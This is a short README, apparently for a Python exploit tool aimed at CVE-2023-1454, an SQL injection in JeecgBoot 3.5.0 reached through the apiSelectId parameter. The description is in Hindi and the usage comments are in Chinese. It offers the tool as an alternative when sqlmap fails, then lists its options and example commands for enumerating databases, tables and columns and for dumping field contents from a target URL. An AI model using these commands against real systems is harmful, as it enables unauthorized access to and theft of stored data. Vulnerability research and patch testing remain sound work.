
JeecgBoot SQL(CVE-2023-1454)sqlmap इंजेक्शन काम न करने की स्थिति में इस स्क्रिप्ट का उपयोग किया जा सकता है।
jeecg-boot 3.5.0 संस्करण में SQL इंजेक्शन भेद्यता मौजूद है। यह भेद्यता फ़ाइल jmreport/qurestSql में सुरक्षा समस्या से उत्पन्न होती है, पैरामीटर apiSelectId के माध्यम से SQL इंजेक्शन होता है।
python3 CVE-2023-1454.py
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Specify the base URL
--current-db View current database
--dbs View all databases
-D DATABASE, --database DATABASE
Specify the database name
--tables View tables in the specified database
-T TABLE, --table TABLE
Specify the table name
--columns View columns in the specified table
-C COLUMN, --column COLUMN
Specify the column name
Example:
python3 CVE-2023-1454.py -u xxx.com --current-db 查看当前使用数据库名
python3 CVE-2023-1454.py -u xxx.com -dbs 查看所有数据库名
python3 CVE-2023-1454.py -u xxx.com -D 数据库名 --tables 查看数据库下的表名
python3 CVE-2023-1454.py -u xxx.com -D 数据库名 -T 表名 --columns 查看表下的字段名
python3 CVE-2023-1454.py -u xxx.com -D 数据库名 -T 表名 -C 字段名 查看字段